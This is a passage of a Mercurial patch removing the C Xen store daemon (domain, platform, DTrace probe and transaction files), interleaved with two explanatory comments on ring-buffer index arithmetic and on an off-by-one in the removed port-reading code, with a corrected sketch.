-       domid = atoi(vec[0]);
-       mfn = atol(vec[1]);
-       port = atoi(vec[2]);
-
-       /* Sanity check args. */
-       if (port <= 0) { 
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       domain = find_domain_by_domid(domid);
-
-       if (domain == NULL) {
-               interface = xc_map_foreign_range(
-                       *xc_handle, domid,
-                       getpagesize(), PROT_READ|PROT_WRITE, mfn);
-               if (!interface) {
-                       send_error(conn, errno);
-                       return;
-               }
-               /* Hang domain off "in" until we're finished. */
-               domain = new_domain(in, domid, port);
-               if (!domain) {
-                       munmap(interface, getpagesize());
-                       send_error(conn, errno);
-                       return;
-               }
-               domain->interface = interface;
-               domain->mfn = mfn;
-
-               /* Now domain belongs to its connection. */
-               talloc_steal(domain->conn, domain);
-
-               fire_watches(NULL, "@introduceDomain", false);
-       } else if ((domain->mfn == mfn) && (domain->conn != conn)) {
-               /* Use XS_INTRODUCE for recreating the xenbus event-channel. */
-               if (domain->port)
-                       xc_evtchn_unbind(xce_handle, domain->port);
-               rc = xc_evtchn_bind_interdomain(xce_handle, domid, port);
-               domain->port = (rc == -1) ? 0 : rc;
-               domain->remote_port = port;
-       } else {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       domain_conn_reset(domain);
-
-       send_ack(conn, XS_INTRODUCE);
-}
-
-void do_set_target(struct connection *conn, struct buffered_data *in)
-{
-       char *vec[2];
-       unsigned int domid, tdomid;
-        struct domain *domain, *tdomain;
-       if (get_strings(in, vec, ARRAY_SIZE(vec)) < ARRAY_SIZE(vec)) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if (conn->id != 0 || !conn->can_write) {
-               send_error(conn, EACCES);
-               return;
-       }
-
-       domid = atoi(vec[0]);
-       tdomid = atoi(vec[1]);
-
-        domain = find_domain_by_domid(domid);
-       if (!domain) {
-               send_error(conn, ENOENT);
-               return;
-       }
-        if (!domain->conn) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-        tdomain = find_domain_by_domid(tdomid);
-       if (!tdomain) {
-               send_error(conn, ENOENT);
-               return;
-       }
-
-        if (!tdomain->conn) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-        talloc_reference(domain->conn, tdomain->conn);
-        domain->conn->target = tdomain->conn;
-
-       send_ack(conn, XS_SET_TARGET);
-}
-
-/* domid */
-void do_release(struct connection *conn, const char *domid_str)
-{
-       struct domain *domain;
-       unsigned int domid;
-
-       if (!domid_str) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       domid = atoi(domid_str);
-       if (!domid) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if (conn->id != 0) {
-               send_error(conn, EACCES);
-               return;
-       }
-
-       domain = find_domain_by_domid(domid);
-       if (!domain) {
-               send_error(conn, ENOENT);
-               return;
-       }
-
-       if (!domain->conn) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       talloc_free(domain->conn);
-
-       send_ack(conn, XS_RELEASE);
-}
-
-void do_resume(struct connection *conn, const char *domid_str)
-{
-       struct domain *domain;
-       unsigned int domid;
-
-       if (!domid_str) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       domid = atoi(domid_str);
-       if (!domid) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if (conn->id != 0) {
-               send_error(conn, EACCES);
-               return;
-       }
-
-       domain = find_domain_by_domid(domid);
-       if (!domain) {
-               send_error(conn, ENOENT);
-               return;
-       }
-
-       if (!domain->conn) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       domain->shutdown = 0;
-       
-       send_ack(conn, XS_RESUME);
-}
-
-void do_get_domain_path(struct connection *conn, const char *domid_str)
-{
-       char *path;
-
-       if (!domid_str) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       path = talloc_domain_path(conn, atoi(domid_str));
-
-       send_reply(conn, XS_GET_DOMAIN_PATH, path, strlen(path) + 1);
-
-       talloc_free(path);
-}
-
-void do_is_domain_introduced(struct connection *conn, const char *domid_str)
-{
-       int result;
-       unsigned int domid;
-
-       if (!domid_str) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       domid = atoi(domid_str);
-       if (domid == DOMID_SELF)
-               result = 1;
-       else
-               result = (find_domain_by_domid(domid) != NULL);
-
-       send_reply(conn, XS_IS_DOMAIN_INTRODUCED, result ? "T" : "F", 2);
-}
-
-static int close_xc_handle(void *_handle)
-{
-       xc_interface_close(*(int *)_handle);
-       return 0;
-}
-
-/* Returns the implicit path of a connection (only domains have this) */
-const char *get_implicit_path(const struct connection *conn)
-{
-       if (!conn->domain)
-               return NULL;
-       return conn->domain->path;
-}
-
-/* Restore existing connections. */
-void restore_existing_connections(void)
-{
-}
-
-static int dom0_init(void) 
-{ 
-       evtchn_port_t port;
-       struct domain *dom0;
-
-       port = xenbus_evtchn();
-       if (port == -1)
-               return -1;
-
-       dom0 = new_domain(NULL, 0, port); 
-       if (dom0 == NULL)
-               return -1;
-
-       dom0->interface = xenbus_map();
-       if (dom0->interface == NULL)
-               return -1;
-
-       talloc_steal(dom0->conn, dom0); 
-
-       xc_evtchn_notify(xce_handle, dom0->port); 
-
-       return 0; 
-}
-
-/* Returns the event channel handle. */
-int domain_init(void)
-{
-       int rc;
-
-       xc_handle = talloc(talloc_autofree_context(), int);
-       if (!xc_handle)
-               barf_perror("Failed to allocate domain handle");
-
-       *xc_handle = xc_interface_open();
-       if (*xc_handle < 0)
-               barf_perror("Failed to open connection to hypervisor");
-
-       talloc_set_destructor(xc_handle, close_xc_handle);
-
-       xce_handle = xc_evtchn_open();
-
-       if (xce_handle < 0)
-               barf_perror("Failed to open evtchn device");
-
-       if (dom0_init() != 0) 
-               barf_perror("Failed to initialize dom0 state"); 
-
-       if ((rc = xc_evtchn_bind_virq(xce_handle, VIRQ_DOM_EXC)) == -1)
-               barf_perror("Failed to bind to domain exception virq port");
-       virq_port = rc;
-
-       return xce_handle;
-}
-
-void domain_entry_inc(struct connection *conn, struct node *node)
-{
-       struct domain *d;
-
-       if (!conn)
-               return;
-
-       if (node->perms && node->perms[0].id != conn->id) {
-               if (conn->transaction) {
-                       transaction_entry_inc(conn->transaction,
-                               node->perms[0].id);
-               } else {
-                       d = find_domain_by_domid(node->perms[0].id);
-                       if (d)
-                               d->nbentry++;
-               }
-       } else if (conn->domain) {
-               if (conn->transaction) {
-                       transaction_entry_inc(conn->transaction,
-                               conn->domain->domid);
-               } else {
-                       conn->domain->nbentry++;
-               }
-       }
-}
-
-void domain_entry_dec(struct connection *conn, struct node *node)
-{
-       struct domain *d;
-
-       if (!conn)
-               return;
-
-       if (node->perms && node->perms[0].id != conn->id) {
-               if (conn->transaction) {
-                       transaction_entry_dec(conn->transaction,
-                               node->perms[0].id);
-               } else {
-                       d = find_domain_by_domid(node->perms[0].id);
-                       if (d && d->nbentry)
-                               d->nbentry--;
-               }
-       } else if (conn->domain && conn->domain->nbentry) {
-               if (conn->transaction) {
-                       transaction_entry_dec(conn->transaction,
-                               conn->domain->domid);
-               } else {
-                       conn->domain->nbentry--;
-               }
-       }
-}
-
-void domain_entry_fix(unsigned int domid, int num)
-{
-       struct domain *d;
-
-       d = find_domain_by_domid(domid);
-       if (d && ((d->nbentry += num) < 0))
-               d->nbentry = 0;
-}
-
-int domain_entry(struct connection *conn)
-{
-       return (domain_is_unprivileged(conn))
-               ? conn->domain->nbentry
-               : 0;
-}
-
-void domain_watch_inc(struct connection *conn)
-{
-       if (!conn || !conn->domain)
-               return;
-       conn->domain->nbwatch++;
-}
-
-void domain_watch_dec(struct connection *conn)
-{
-       if (!conn || !conn->domain)
-               return;
-       if (conn->domain->nbwatch)
-               conn->domain->nbwatch--;
-}
-
-int domain_watch(struct connection *conn)
-{
-       return (domain_is_unprivileged(conn))
-               ? conn->domain->nbwatch
-               : 0;
-}
-
-/*
- * Local variables:
- *  c-file-style: "linux"
- *  indent-tabs-mode: t
- *  c-indent-level: 8
- *  c-basic-offset: 8
- *  tab-width: 8
- * End:
- */
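
As a reference for anyone comparing the OCaml replacement against the C being removed: check_indexes(), get_input_chunk() and get_output_chunk() in the file above rely on free-running 32-bit producer/consumer indexes, so the unsigned difference prod - cons stays correct even after the indexes wrap. The sketch below restates that arithmetic in isolation. RING_SIZE is assumed to be 1024 here (it must be a power of two for the mask to work), and ring_idx_t, MASK_IDX and the ring_* function names are illustrative stand-ins, not the real identifiers.

```c
#include <stdbool.h>
#include <stdint.h>

#define RING_SIZE 1024u                       /* assumed; must be a power of two */
#define MASK_IDX(idx) ((idx) & (RING_SIZE - 1))

typedef uint32_t ring_idx_t;

/* The producer may never be more than one full ring ahead of the consumer. */
static bool ring_indexes_valid(ring_idx_t cons, ring_idx_t prod)
{
    return (ring_idx_t)(prod - cons) <= RING_SIZE;
}

/* Contiguous bytes that can be read starting at cons. */
static uint32_t ring_input_len(ring_idx_t cons, ring_idx_t prod)
{
    uint32_t len = RING_SIZE - MASK_IDX(cons);    /* bytes up to the end of the ring */

    if ((ring_idx_t)(prod - cons) < len)
        len = prod - cons;                        /* limited by the data available */
    return len;
}

/* Contiguous bytes that can be written starting at prod. */
static uint32_t ring_output_len(ring_idx_t cons, ring_idx_t prod)
{
    uint32_t len = RING_SIZE - MASK_IDX(prod);    /* bytes up to the end of the ring */
    uint32_t space = RING_SIZE - (ring_idx_t)(prod - cons);

    if (space < len)
        len = space;                              /* limited by the free space */
    return len;
}
```

Both length helpers return only the contiguous part, so a transfer that crosses the end of the ring takes two calls. That matches readchn() and writechn() above, which copy at most the available chunk and return the short count.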
diff -r 10a8fae412c5 tools/xenstore/xenstored_domain.h
--- a/tools/xenstore/xenstored_domain.h Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,67 +0,0 @@
-/* 
-    Domain communications for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#ifndef _XENSTORED_DOMAIN_H
-#define _XENSTORED_DOMAIN_H
-
-void handle_event(void);
-
-/* domid, mfn, eventchn, path */
-void do_introduce(struct connection *conn, struct buffered_data *in);
-
-/* domid */
-void do_is_domain_introduced(struct connection *conn, const char *domid_str);
-
-/* domid */
-void do_release(struct connection *conn, const char *domid_str);
-
-/* domid */
-void do_resume(struct connection *conn, const char *domid_str);
-
-/* domid, target */
-void do_set_target(struct connection *conn, struct buffered_data *in);
-
-/* domid */
-void do_get_domain_path(struct connection *conn, const char *domid_str);
-
-/* Returns the event channel handle */
-int domain_init(void);
-
-/* Returns the implicit path of a connection (only domains have this) */
-const char *get_implicit_path(const struct connection *conn);
-
-/* Read existing connection information from store. */
-void restore_existing_connections(void);
-
-/* Can connection attached to domain read/write. */
-bool domain_can_read(struct connection *conn);
-bool domain_can_write(struct connection *conn);
-
-bool domain_is_unprivileged(struct connection *conn);
-
-/* Quota manipulation */
-void domain_entry_inc(struct connection *conn, struct node *);
-void domain_entry_dec(struct connection *conn, struct node *);
-void domain_entry_fix(unsigned int domid, int num);
-int domain_entry(struct connection *conn);
-void domain_watch_inc(struct connection *conn);
-void domain_watch_dec(struct connection *conn);
-int domain_watch(struct connection *conn);
-
-#endif /* _XENSTORED_DOMAIN_H */
diff -r 10a8fae412c5 tools/xenstore/xenstored_linux.c
--- a/tools/xenstore/xenstored_linux.c  Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,73 +0,0 @@
-/******************************************************************************
- *
- * Copyright 2006 Sun Microsystems, Inc.  All rights reserved.
- * Use is subject to license terms.
- *
- * Copyright (C) 2005 Rusty Russell IBM Corporation
- *
- * This program is free software; you can redistribute it and/or
- * modify it under the terms of the GNU General Public License as
- * published by the Free Software Foundation, version 2 of the
- * License.
- */
-
-#include <fcntl.h>
-#include <unistd.h>
-#include <stdlib.h>
-#include <sys/mman.h>
-
-#include "xenstored_core.h"
-
-#define XENSTORED_PROC_KVA  "/proc/xen/xsd_kva"
-#define XENSTORED_PROC_PORT "/proc/xen/xsd_port"
-
-evtchn_port_t xenbus_evtchn(void)
-{
-       int fd;
-       int rc;
-       evtchn_port_t port; 
-       char str[20]; 
-
-       fd = open(XENSTORED_PROC_PORT, O_RDONLY); 
-       if (fd == -1)
-               return -1;
-
-       rc = read(fd, str, sizeof(str)); 
-       if (rc == -1)
-       {
-               int err = errno;
-               close(fd);
-               errno = err;
-               return -1;
-       }
-
-       str[rc] = '\0'; 
-       port = strtoul(str, NULL, 0); 
-
-       close(fd); 
-       return port;
-}
-
-void *xenbus_map(void)
-{
-       int fd;
-       void *addr;
-
-       fd = open(XENSTORED_PROC_KVA, O_RDWR);
-       if (fd == -1)
-               return NULL;
-
-       addr = mmap(NULL, getpagesize(), PROT_READ|PROT_WRITE,
-               MAP_SHARED, fd, 0);
-
-       if (addr == MAP_FAILED)
-               addr = NULL;
-
-       close(fd);
-
-       return addr;
-}
-
-void xenbus_notify_running(void)
-{
-}
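
One detail worth carrying over when reimplementing xenbus_evtchn(): the removed code reads up to sizeof(str) bytes and then stores the terminator at str[rc], so a read that filled all 20 bytes would write one past the end of the array. The same pattern appears in the NetBSD copy. Below is a minimal sketch of a bounded variant, assuming the port file holds a short decimal or hex number. read_port_file is a hypothetical helper name and is not part of the patch.

```c
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Read an unsigned port number from the file at path.
 * Returns 0 and stores the value in *port on success, -1 with errno set
 * on failure. Hypothetical helper, for illustration only.
 */
static int read_port_file(const char *path, unsigned int *port)
{
    char str[20];
    char *end;
    unsigned long val;
    ssize_t rc;
    int fd, err;

    fd = open(path, O_RDONLY);
    if (fd == -1)
        return -1;

    /* Leave room for the terminator so str[rc] is always in bounds. */
    rc = read(fd, str, sizeof(str) - 1);
    err = errno;
    close(fd);
    if (rc <= 0) {
        errno = (rc == 0) ? EINVAL : err;
        return -1;
    }
    str[rc] = '\0';

    errno = 0;
    val = strtoul(str, &end, 0);
    if (end == str || val > UINT_MAX) {
        errno = EINVAL;       /* no digits, or value does not fit */
        return -1;
    }
    if (errno != 0)
        return -1;            /* strtoul reported ERANGE */

    *port = (unsigned int)val;
    return 0;
}
```

Returning the status separately from the port value also avoids having to encode failure as -1 inside the port itself.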
diff -r 10a8fae412c5 tools/xenstore/xenstored_netbsd.c
--- a/tools/xenstore/xenstored_netbsd.c Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,73 +0,0 @@
-/******************************************************************************
- *
- * Copyright 2006 Sun Microsystems, Inc.  All rights reserved.
- * Use is subject to license terms.
- *
- * Copyright (C) 2005 Rusty Russell IBM Corporation
- *
- * This program is free software; you can redistribute it and/or
- * modify it under the terms of the GNU General Public License as
- * published by the Free Software Foundation, version 2 of the
- * License.
- */
-
-#include <fcntl.h>
-#include <unistd.h>
-#include <stdlib.h>
-#include <sys/mman.h>
-
-#include "xenstored_core.h"
-
-#define XENSTORED_PROC_KVA  "/dev/xsd_kva"
-#define XENSTORED_PROC_PORT "/kern/xen/xsd_port"
-
-evtchn_port_t xenbus_evtchn(void)
-{
-       int fd;
-       int rc;
-       evtchn_port_t port; 
-       char str[20]; 
-
-       fd = open(XENSTORED_PROC_PORT, O_RDONLY); 
-       if (fd == -1)
-               return -1;
-
-       rc = read(fd, str, sizeof(str)); 
-       if (rc == -1)
-       {
-               int err = errno;
-               close(fd);
-               errno = err;
-               return -1;
-       }
-
-       str[rc] = '\0'; 
-       port = strtoul(str, NULL, 0); 
-
-       close(fd); 
-       return port;
-}
-
-void *xenbus_map(void)
-{
-       int fd;
-       void *addr;
-
-       fd = open(XENSTORED_PROC_KVA, O_RDWR);
-       if (fd == -1)
-               return NULL;
-
-       addr = mmap(NULL, getpagesize(), PROT_READ|PROT_WRITE,
-               MAP_SHARED, fd, 0);
-
-       if (addr == MAP_FAILED)
-               addr = NULL;
-
-       close(fd);
-
-       return addr;
-}
-
-void xenbus_notify_running(void)
-{
-}
diff -r 10a8fae412c5 tools/xenstore/xenstored_probes.d
--- a/tools/xenstore/xenstored_probes.d Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,28 +0,0 @@
-/*
- * Copyright 2007 Sun Microsystems, Inc.  All rights reserved.
- * Use is subject to license terms.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, version 2 of the License.
- */
-
-#include <sys/types.h>
-
-provider xenstore {
-       /* tx id, dom id, pid, type, msg */
-       probe msg(uint32_t, unsigned int, pid_t, int, const char *);
-       /* tx id, dom id, pid, type, reply */
-       probe reply(uint32_t, unsigned int, pid_t, int, const char *);
-       /* tx id, dom id, pid, reply */
-       probe error(uint32_t, unsigned int, pid_t, const char *);
-       /* dom id, pid, watch details */
-       probe watch_event(unsigned int, pid_t, const char *);
-};
-
-#pragma D attributes Evolving/Evolving/Common provider xenstore provider
-#pragma D attributes Private/Private/Unknown provider xenstore module
-#pragma D attributes Private/Private/Unknown provider xenstore function
-#pragma D attributes Evolving/Evolving/Common provider xenstore name
-#pragma D attributes Evolving/Evolving/Common provider xenstore args
-
diff -r 10a8fae412c5 tools/xenstore/xenstored_solaris.c
--- a/tools/xenstore/xenstored_solaris.c        Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,168 +0,0 @@
-/******************************************************************************
- *
- * Copyright 2006 Sun Microsystems, Inc.  All rights reserved.
- * Use is subject to license terms.
- *
- * Copyright (C) 2005 Rusty Russell IBM Corporation
- *
- * This program is free software; you can redistribute it and/or
- * modify it under the terms of the GNU General Public License as
- * published by the Free Software Foundation, version 2 of the
- * License.
- */
-
-#include <fcntl.h>
-#include <unistd.h>
-#include <stdlib.h>
-#include <stdarg.h>
-#include <sys/mman.h>
-#include <strings.h>
-#include <ucred.h>
-#include <stdio.h>
-
-#include <xen/sys/xenbus.h>
-
-#include "talloc.h"
-#include "xenstored_core.h"
-#include "xenstored_probes.h"
-
-evtchn_port_t xenbus_evtchn(void)
-{
-       int fd;
-       evtchn_port_t port; 
-
-       fd = open("/dev/xen/xenbus", O_RDONLY); 
-       if (fd == -1)
-               return -1;
-
-       port = ioctl(fd, IOCTL_XENBUS_XENSTORE_EVTCHN);
-
-       close(fd); 
-       return port;
-}
-
-void *xenbus_map(void)
-{
-       int fd;
-       void *addr;
-
-       fd = open("/dev/xen/xenbus", O_RDWR);
-       if (fd == -1)
-               return NULL;
-
-       addr = mmap(NULL, getpagesize(), PROT_READ|PROT_WRITE,
-               MAP_SHARED, fd, 0);
-
-       if (addr == MAP_FAILED)
-               addr = NULL;
-
-       close(fd);
-
-       return addr;
-}
-
-void xenbus_notify_running(void)
-{
-       int fd;
-
-       fd = open("/dev/xen/xenbus", O_RDONLY);
-
-       (void) ioctl(fd, IOCTL_XENBUS_NOTIFY_UP);
-
-       close(fd);
-}
-
-static pid_t cred(const struct connection *conn)
-{
-       ucred_t *ucred = NULL;
-       pid_t pid;
-
-       if (conn->domain)
-               return (0);
-
-       if (getpeerucred(conn->fd, &ucred) == -1)
-               return (0);
-
-       pid = ucred_getpid(ucred);
-
-       ucred_free(ucred);
-       return (pid);
-}
-
-/*
- * The strings are often a number of nil-separated strings. We'll just
- * replace the separators with spaces - not quite right, but good
- * enough.
- */
-static char *
-mangle(const struct connection *conn, const struct buffered_data *in)
-{
-       char *str;
-       int i;
-
-       if (in->hdr.msg.len == 0)
-               return (talloc_strdup(conn, ""));
-
-       if ((str = talloc_zero_size(conn, in->hdr.msg.len + 1)) == NULL)
-               return (NULL);
-
-       memcpy(str, in->buffer, in->hdr.msg.len);
-       
-       /*
-        * The protocol is absurdly inconsistent in whether the length
-        * includes the terminating nil or not; replace all nils that
-        * aren't the last one.
-        */
-       for (i = 0; i < (in->hdr.msg.len - 1); i++) {
-               if (str[i] == '\0')
-                       str[i] = ' ';
-       }
-
-       return (str);
-}
-
-void
-dtrace_io(const struct connection *conn, const struct buffered_data *in,
-    int io_out)
-{
-       if (!io_out) {
-               if (XENSTORE_MSG_ENABLED()) {
-                       char *mangled = mangle(conn, in);
-                       XENSTORE_MSG(in->hdr.msg.tx_id, conn->id, cred(conn),
-                           in->hdr.msg.type, mangled);
-               }
-
-               goto out;
-       }
-
-       switch (in->hdr.msg.type) {
-       case XS_ERROR:
-               if (XENSTORE_ERROR_ENABLED()) {
-                       char *mangled = mangle(conn, in);
-                       XENSTORE_ERROR(in->hdr.msg.tx_id, conn->id,
-                           cred(conn), mangled);
-               }
-               break;
-
-       case XS_WATCH_EVENT:
-               if (XENSTORE_WATCH_EVENT_ENABLED()) {
-                       char *mangled = mangle(conn, in);
-                       XENSTORE_WATCH_EVENT(conn->id, cred(conn), mangled);
-               }
-               break;
-
-       default:
-               if (XENSTORE_REPLY_ENABLED()) {
-                       char *mangled = mangle(conn, in);
-                       XENSTORE_REPLY(in->hdr.msg.tx_id, conn->id, cred(conn),
-                           in->hdr.msg.type, mangled);
-               }
-               break;
-       }
-
-out:
-       /*
-        * 6589130 dtrace -G fails for certain tail-calls on x86
-        */
-       asm("nop");
-}
diff -r 10a8fae412c5 tools/xenstore/xenstored_transaction.c
--- a/tools/xenstore/xenstored_transaction.c    Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,291 +0,0 @@
-/* 
-    Transaction code for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-#include <stdio.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <sys/wait.h>
-#include <sys/time.h>
-#include <time.h>
-#include <assert.h>
-#include <stdarg.h>
-#include <stdlib.h>
-#include <fcntl.h>
-#include <unistd.h>
-#include "talloc.h"
-#include "list.h"
-#include "xenstored_transaction.h"
-#include "xenstored_watch.h"
-#include "xenstored_domain.h"
-#include "xs_lib.h"
-#include "utils.h"
-
-struct changed_node
-{
-       /* List of all changed nodes in the context of this transaction. */
-       struct list_head list;
-
-       /* The name of the node. */
-       char *node;
-
-       /* And the children? (ie. rm) */
-       bool recurse;
-};
-
-struct changed_domain
-{
-       /* List of all changed domains in the context of this transaction. */
-       struct list_head list;
-
-       /* Identifier of the changed domain. */
-       unsigned int domid;
-
-       /* Amount by which this domain's nbentry field has changed. */
-       int nbentry;
-};
-
-struct transaction
-{
-       /* List of all transactions active on this connection. */
-       struct list_head list;
-
-       /* Connection-local identifier for this transaction. */
-       uint32_t id;
-
-       /* Generation when transaction started. */
-       unsigned int generation;
-
-       /* TDB to work on, and filename */
-       TDB_CONTEXT *tdb;
-       char *tdb_name;
-
-       /* List of changed nodes. */
-       struct list_head changes;
-
-       /* List of changed domains - to record the changed domain entry number */
-       struct list_head changed_domains;
-};
-
-extern int quota_max_transaction;
-static unsigned int generation;
-
-/* Return tdb context to use for this connection. */
-TDB_CONTEXT *tdb_transaction_context(struct transaction *trans)
-{
-       return trans->tdb;
-}
-
-/* Callers get a change node (which can fail) and only commit after they've
- * finished.  This way they don't have to unwind eg. a write. */
-void add_change_node(struct transaction *trans, const char *node, bool recurse)
-{
-       struct changed_node *i;
-
-       if (!trans) {
-               /* They're changing the global database. */
-               generation++;
-               return;
-       }
-
-       list_for_each_entry(i, &trans->changes, list)
-               if (streq(i->node, node))
-                       return;
-
-       i = talloc(trans, struct changed_node);
-       i->node = talloc_strdup(i, node);
-       i->recurse = recurse;
-       list_add_tail(&i->list, &trans->changes);
-}
-
-static int destroy_transaction(void *_transaction)
-{
-       struct transaction *trans = _transaction;
-
-       trace_destroy(trans, "transaction");
-       if (trans->tdb)
-               tdb_close(trans->tdb);
-       unlink(trans->tdb_name);
-       return 0;
-}
-
-struct transaction *transaction_lookup(struct connection *conn, uint32_t id)
-{
-       struct transaction *trans;
-
-       if (id == 0)
-               return NULL;
-
-       list_for_each_entry(trans, &conn->transaction_list, list)
-               if (trans->id == id)
-                       return trans;
-
-       return ERR_PTR(-ENOENT);
-}
-
-void do_transaction_start(struct connection *conn, struct buffered_data *in)
-{
-       struct transaction *trans, *exists;
-       char id_str[20];
-
-       /* We don't support nested transactions. */
-       if (conn->transaction) {
-               send_error(conn, EBUSY);
-               return;
-       }
-
-       if (conn->id && conn->transaction_started > quota_max_transaction) {
-               send_error(conn, ENOSPC);
-               return;
-       }
-
-       /* Attach transaction to input for autofree until it's complete */
-       trans = talloc(in, struct transaction);
-       INIT_LIST_HEAD(&trans->changes);
-       INIT_LIST_HEAD(&trans->changed_domains);
-       trans->generation = generation;
-       trans->tdb_name = talloc_asprintf(trans, "%s.%p",
-                                         xs_daemon_tdb(), trans);
-       trans->tdb = tdb_copy(tdb_context(conn), trans->tdb_name);
-       if (!trans->tdb) {
-               send_error(conn, errno);
-               return;
-       }
-       /* Make it close if we go away. */
-       talloc_steal(trans, trans->tdb);
-
-       /* Pick an unused transaction identifier. */
-       do {
-               trans->id = conn->next_transaction_id;
-               exists = transaction_lookup(conn, conn->next_transaction_id++);
-       } while (!IS_ERR(exists));
-
-       /* Now we own it. */
-       list_add_tail(&trans->list, &conn->transaction_list);
-       talloc_steal(conn, trans);
-       talloc_set_destructor(trans, destroy_transaction);
-       conn->transaction_started++;
-
-       snprintf(id_str, sizeof(id_str), "%u", trans->id);
-       send_reply(conn, XS_TRANSACTION_START, id_str, strlen(id_str)+1);
-}
-
-void do_transaction_end(struct connection *conn, const char *arg)
-{
-       struct changed_node *i;
-       struct changed_domain *d;
-       struct transaction *trans;
-
-       if (!arg || (!streq(arg, "T") && !streq(arg, "F"))) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if ((trans = conn->transaction) == NULL) {
-               send_error(conn, ENOENT);
-               return;
-       }
-
-       conn->transaction = NULL;
-       list_del(&trans->list);
-       conn->transaction_started--;
-
-       /* Attach transaction to arg for auto-cleanup */
-       talloc_steal(arg, trans);
-
-       if (streq(arg, "T")) {
-               /* FIXME: Merge, rather failing on any change. */
-               if (trans->generation != generation) {
-                       send_error(conn, EAGAIN);
-                       return;
-               }
-               if (!replace_tdb(trans->tdb_name, trans->tdb)) {
-                       send_error(conn, errno);
-                       return;
-               }
-               /* Don't close this: we won! */
-               trans->tdb = NULL;
-
-               /* fix domain entry for each changed domain */
-               list_for_each_entry(d, &trans->changed_domains, list)
-                       domain_entry_fix(d->domid, d->nbentry);
-
-               /* Fire off the watches for everything that changed. */
-               list_for_each_entry(i, &trans->changes, list)
-                       fire_watches(conn, i->node, i->recurse);
-               generation++;
-       }
-       send_ack(conn, XS_TRANSACTION_END);
-}
-
-void transaction_entry_inc(struct transaction *trans, unsigned int domid)
-{
-       struct changed_domain *d;
-
-       list_for_each_entry(d, &trans->changed_domains, list)
-               if (d->domid == domid) {
-                       d->nbentry++;
-                       return;
-               }
-
-       d = talloc(trans, struct changed_domain);
-       d->domid = domid;
-       d->nbentry = 1;
-       list_add_tail(&d->list, &trans->changed_domains);
-}
-
-void transaction_entry_dec(struct transaction *trans, unsigned int domid)
-{
-       struct changed_domain *d;
-
-       list_for_each_entry(d, &trans->changed_domains, list)
-               if (d->domid == domid) {
-                       d->nbentry--;
-                       return;
-               }
-
-       d = talloc(trans, struct changed_domain);
-       d->domid = domid;
-       d->nbentry = -1;
-       list_add_tail(&d->list, &trans->changed_domains);
-}
-
-void conn_delete_all_transactions(struct connection *conn)
-{
-       struct transaction *trans;
-
-       while ((trans = list_top(&conn->transaction_list,
-                                struct transaction, list))) {
-               list_del(&trans->list);
-               talloc_free(trans);
-       }
-
-       assert(conn->transaction == NULL);
-
-       conn->transaction_started = 0;
-}
-
-/*
- * Local variables:
- *  c-file-style: "linux"
- *  indent-tabs-mode: t
- *  c-indent-level: 8
- *  c-basic-offset: 8
- *  tab-width: 8
- * End:
- */
diff -r 10a8fae412c5 tools/xenstore/xenstored_transaction.h
--- a/tools/xenstore/xenstored_transaction.h    Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,43 +0,0 @@
-/* 
-    Transaction code for Xen Store Daemon.
-    Copyright (C) 2005 Rusty Russell IBM Corporation
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License
-    along with this program; if not, write to the Free Software
-    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
